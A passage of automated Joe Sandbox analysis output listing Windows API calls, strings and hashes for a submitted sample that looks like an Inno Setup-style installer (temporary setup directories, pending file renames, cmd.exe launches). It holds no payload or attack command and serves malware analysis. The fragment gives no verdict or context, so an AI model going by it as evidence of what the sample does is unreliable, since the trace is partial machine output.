                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                              • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                              • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                              • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID: 3A$yA
                                                                              • API String ID: 3887896539-3278460822
                                                                              • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                              • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                              • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                              • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F58F
                                                                              • GetFocus.USER32 ref: 0042F597
                                                                              • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                              • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,004581A2,00000000,0049B628), ref: 0042F654
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                              • String ID: TWindowDisabler-Window
                                                                              • API String ID: 3167913817-1824977358
                                                                              • Opcode ID: af2d58cb1d61aa5294d5b80584b5773ea49d3efeec85bd27a4eae10aec25b275
                                                                              • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                              • Opcode Fuzzy Hash: af2d58cb1d61aa5294d5b80584b5773ea49d3efeec85bd27a4eae10aec25b275
                                                                              • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 00453210
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 0045322A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 460e23cb00cf3424ad6d0c49a1f828097ca48bff1b05d8589e040c86aeca4b16
                                                                              • Instruction ID: 0cfad7ca53bf4133c716031d63a26ec494c9be7874946ed143d2344feace3e75
                                                                              • Opcode Fuzzy Hash: 460e23cb00cf3424ad6d0c49a1f828097ca48bff1b05d8589e040c86aeca4b16
                                                                              • Instruction Fuzzy Hash: 9F01D870240B04BED3016F63AD12F563A58E755B5BF5044BBFC1496582C77C4A088EAD
                                                                              APIs
                                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467097
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004670BD
                                                                                • Part of subcall function 00466F34: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466FCC
                                                                                • Part of subcall function 00466F34: DestroyCursor.USER32(00000000), ref: 00466FE2
                                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467114
                                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467175
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046719B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                              • String ID: c:\directory$shell32.dll
                                                                              • API String ID: 3376378930-1375355148
                                                                              • Opcode ID: 6d041171d1007e38f1423e999fca6c8345fae3a72a3914b9ee39d1bb44a6fd6f
                                                                              • Instruction ID: 28e44f0b0ade20fd2fa41990bb26b25d2b6273e6e4b8387af8825f96a0abaac4
                                                                              • Opcode Fuzzy Hash: 6d041171d1007e38f1423e999fca6c8345fae3a72a3914b9ee39d1bb44a6fd6f
                                                                              • Instruction Fuzzy Hash: 65517E70604204AFD710DF65CD89FDFB7E8EB49308F1081A7F8089B351D6389E81CA69
                                                                              APIs
                                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                              Similarity
                                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                              • API String ID: 4130936913-2943970505
                                                                              • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                              • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                              • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                              • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472199,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555), ref: 00472175
                                                                              • FindClose.KERNEL32(000000FF,004721A0,00472199,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555,?), ref: 00472193
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004722BB,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555), ref: 00472297
                                                                              • FindClose.KERNEL32(000000FF,004722C2,004722BB,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555,?), ref: 004722B5
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID: &&G$&&G
                                                                              • API String ID: 2066263336-852616326
                                                                              • Opcode ID: 53d573c3283eea8276722ae00e783839c534cad26cf1d76589be1e10efaeed4f
                                                                              • Instruction ID: 5d8f9e8498e1fb85c1a49ff99105bc28d4ff0fd985b73b461b66a4ef7da0b053
                                                                              • Opcode Fuzzy Hash: 53d573c3283eea8276722ae00e783839c534cad26cf1d76589be1e10efaeed4f
                                                                              • Instruction Fuzzy Hash: F0C14C3490424D9FCF11DFA5C981BDEBBB9FF09304F5085AAE908A3291D7789A45CF64
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                              Similarity
                                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                              • API String ID: 854858120-615399546
                                                                              • Opcode ID: d48cb867d8132222f58630969ce6cc8153310e3eaa120555069058459d823a95
                                                                              • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                              • Opcode Fuzzy Hash: d48cb867d8132222f58630969ce6cc8153310e3eaa120555069058459d823a95
                                                                              • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                              APIs
                                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                              • OemToCharA.USER32(?,?), ref: 0042375C
                                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                              Similarity
                                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                                              • String ID: 2$MAINICON
                                                                              • API String ID: 3935243913-3181700818
                                                                              • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                              • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                              • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                              • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                              Similarity
                                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                              • API String ID: 316262546-2767913252
                                                                              • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                              • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                              • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                              • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID:
                                                                              • API String ID: 3887896539-0
                                                                              • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                              • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                              • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                              • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                              Strings
                                                                              • WININIT.INI, xrefs: 004557E4
                                                                              • PendingFileRenameOperations2, xrefs: 00455784
                                                                              • PendingFileRenameOperations, xrefs: 00455754
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                              • API String ID: 47109696-2199428270
                                                                              • Opcode ID: ff5e046778063e7c615d5c8ac9a6b1d801ca0d933ef60992733312df31d3558f
                                                                              • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                              • Opcode Fuzzy Hash: ff5e046778063e7c615d5c8ac9a6b1d801ca0d933ef60992733312df31d3558f
                                                                              • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C7DA,?,?,00000000,0049B628,00000000,00000000,?,004980A9,00000000,00498252,?,00000000), ref: 0047C717
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047C7DA,?,?,00000000,0049B628,00000000,00000000,?,004980A9,00000000,00498252,?,00000000), ref: 0047C720
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                              • API String ID: 1375471231-2952887711
                                                                              • Opcode ID: 3f7519f2dbd75ec89759c5e36ccc4ab0adc05f47ddd4608262a1c5d06c660367
                                                                              • Instruction ID: edb20439a36284776f78bdf2a161e381ec1662189dfb35441dcb715623f8c11f
                                                                              • Opcode Fuzzy Hash: 3f7519f2dbd75ec89759c5e36ccc4ab0adc05f47ddd4608262a1c5d06c660367
                                                                              • Instruction Fuzzy Hash: 6F410574A001099BDB01EBA5D8C2ADEB7B5EF44309F50547BE411B7392DB389E058F69
                                                                              APIs
                                                                              • 74D31520.VERSION(00000000,?,?,?,ptI), ref: 00452530
                                                                              • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,ptI), ref: 0045255D
                                                                              • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,ptI), ref: 00452577
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: D31500D31520D31540
                                                                              • String ID: ptI$%E
                                                                              • API String ID: 1003763464-3209181666
                                                                              • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                              • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                              • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                              • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                              APIs
                                                                              • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                              • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                              • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID: \AB
                                                                              • API String ID: 4191631535-3948367934
                                                                              • Opcode ID: bca5fbb655e429c390612aedafb62b4dde642c29ff44978b36ddb9eb5ee27a78
                                                                              • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                              • Opcode Fuzzy Hash: bca5fbb655e429c390612aedafb62b4dde642c29ff44978b36ddb9eb5ee27a78
                                                                              • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                              APIs
                                                                              • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,004973CD), ref: 0042DE6B
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressDeleteHandleModuleProc
                                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                                              • API String ID: 588496660-1846899949
                                                                              • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                              • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                              • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                              • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                              Strings
                                                                              • PrepareToInstall failed: %s, xrefs: 0046BCE2
                                                                              • NextButtonClick, xrefs: 0046BAC0
                                                                              • Need to restart Windows? %s, xrefs: 0046BD09
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                              • API String ID: 0-2329492092
                                                                              • Opcode ID: 37ba51fdfbf3f4723fb08e99647d0fd9c61c097c060f23ffe4e001e6baa90b0a
                                                                              • Instruction ID: b95f389d09e957f91eb9f42d110418d47b08b3dab155efeebd7a2a0376f7d9ee
                                                                              • Opcode Fuzzy Hash: 37ba51fdfbf3f4723fb08e99647d0fd9c61c097c060f23ffe4e001e6baa90b0a
                                                                              • Instruction Fuzzy Hash: F2D12F34A04208DFCB10EBA9D585AED77F5EF09304F5440BAE404EB352D779AE81DB9A
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,00000000,00482EB9), ref: 00482C8C
                                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482D2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
